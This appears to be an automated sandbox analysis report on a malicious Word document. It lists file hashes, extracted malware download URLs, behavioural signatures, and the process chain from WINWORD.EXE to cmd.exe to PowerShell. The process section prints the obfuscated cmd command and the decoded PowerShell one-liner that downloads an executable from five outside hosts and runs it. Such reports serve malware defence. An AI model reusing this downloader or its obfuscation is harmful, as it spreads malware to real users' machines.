Analysis
-
max time kernel
107s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
16-05-2022 20:57
Static task
static1
Behavioral task
behavioral1
Sample
0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc
Resource
win10v2004-20220414-en
General
-
Target
0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc
-
Size
124KB
-
MD5
b6e13c6a1d437ed02509be01dd334983
-
SHA1
a12ee91c820278590d58f0f846067992c1aa1053
-
SHA256
0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318
-
SHA512
8bfc1ffaaa45a8d7f6add5c51e7d1e8e62c95b71b7f76905e3a497f9957227991cd7eef477bc073483d375a3dadaef46d2d7e7376ed170a636fcd194b5836cba
Malware Config
Extracted
http://www.novasystemsindustria.eu/cJcton
http://velvet.com.br/2T6r4fYa
http://www.batikentemlak.org/dEXSJO5y
http://tongkhosoncongnghiep.com/DiJuOX
http://www.fibraoptica.ro/8fG
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1160 3068 CMd.exe 83 -
Blocklisted process makes network request 4 IoCs
flow pid Process 46 2392 powershell.exe 49 2392 powershell.exe 73 2392 powershell.exe 76 2392 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3068 WINWORD.EXE 3068 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2392 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3068 WINWORD.EXE 3068 WINWORD.EXE 3068 WINWORD.EXE 3068 WINWORD.EXE 3068 WINWORD.EXE 3068 WINWORD.EXE 3068 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3068 wrote to memory of 1160 3068 WINWORD.EXE 89 PID 3068 wrote to memory of 1160 3068 WINWORD.EXE 89 PID 1160 wrote to memory of 2392 1160 CMd.exe 97 PID 1160 wrote to memory of 2392 1160 CMd.exe 97
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SYSTEM32\CMd.exeCMd \/ // //// / \ / /V:O/C"set ]}*~=027a 072a 07a2 0a72 207a 2a70 0a72 270a 72a0 7a02 a027 a207 02a7 a702 720a 7a02 72a0 7a02}207a}a072{027aha270ca720t720aaa702c20a7}720a;027ak2a07aa702e072ar7a02b270a;a720J20a7i0a72W27a0$207a 20a7ma270e2a07ta027I70a2-07a2e270ak072ao20a7va702n20a7I072a;07a2)20a7J2a70ia720W702a$7a02 27a0,20a7Ta027D02a7v70a2$a072(20a7e027al72a0ia270F072ad70a2a7a02oa702l2a70n27a0w702aoa702Da207.a207C0a27T207ar27a0$a027{7a20y270ar2a70t0a27{2a07)a270N2a70K20a7ra072$a072 70a2n27a0i0a72 720aT0a72Da207v720a$a702(a702h207ac027aa27a0e0a27ra027o7a20f27a0;2a70'702ae0a27x27a0ea270.a270'7a02+0a27i0a27z072aia207$2a07+02a7'20a7\072a'702a+72a0ca072i072al720ab027au2a07p02a7:27a0va702n702ae70a2$2a07=7a02J027ai0a27Wa702$2a07;2a70'70a262a7052a071a270'207a 07a2=a270 02a7ia027za270ia207$027a;a270)2a70'a027@0a27'7a20(20a7t2a07ia072l072ap2a07S072a.7a02'7a02G072af270a82a70/a270o70a2r0a72.702aa07a2c20a7i20a7t07a2pa702o72a0a720ar2a07b20a7i2a70f7a20.2a70wa027w20a7w20a7/02a7/02a7:0a72pa720ta720ta270h720a@072aX072aOa027ua702J72a0i2a70D27a0/0a72ma072o207aca270.072apa207e7a20i20a7h027ag027an7a02g027an027ao7a20c70a2n0a27o0a27sa027o2a70ha270k072ag027an2a70o702ata072/027a/02a7:0a27pa207t702at27a0h7a02@20a7y027a507a2O72a0Ja720S702aX20a7E7a02da207/72a0ga072r072aoa702.70a2k2a07a72a0l072am072ae270ata702n720ae72a0k072aia072t27a0a20a7b702a.2a70w7a20w07a2w02a7/720a/7a02:07a2p07a2t07a2t720ah20a7@720aaa270Y072af27a0470a2ra0276a270T7a02227a0/2a07r2a70b270a.a270ma072oa207c027a.027at07a2ea027v7a20l20a7e7a20v72a0/027a/720a:0a72p072at0a72ta072ha720@072ana072o207ata072ca720Ja027c2a70/207au7a20e072a.a027a02a7i20a7r702at27a0s0a72u72a0d7a02na270i7a20s702am027aea072t270as0a72ya270sa027a7a20va027oa207n72a0.702aw0a27w027awa270/20a7/720a:72a0pa720t207at2a07h7a20'70a2=2a07N0a27K027ar0a72$7a02;a720ta207n0a72e2a07i70a2l0a27C720aba270e072aW207a.2a07t02a7e27a0N0a27 207at072ac027ae7a20j72a0ba720oa072-a207wa702e207an0a72=702aC20a7T0a72r072a$270a a207l207al2a07e02a7ha702s7a02r20a7ea270wa270oa720p&&for /L %g in (1944,-5,4)do set .#=!.#!!]}*~:~%g,1!&&if %g leq 4 call %.#:~-389%"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $rTC=new-object Net.WebClient;$rKN='http://www.novasystemsindustria.eu/cJcton@http://velvet.com.br/2T6r4fYa@http://www.batikentemlak.org/dEXSJO5y@http://tongkhosoncongnghiep.com/DiJuOX@http://www.fibraoptica.ro/8fG'.Split('@');$izi = '156';$WiJ=$env:public+'\'+$izi+'.exe';foreach($vDT in $rKN){try{$rTC.DownloadFile($vDT, $WiJ);Invoke-Item $WiJ;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-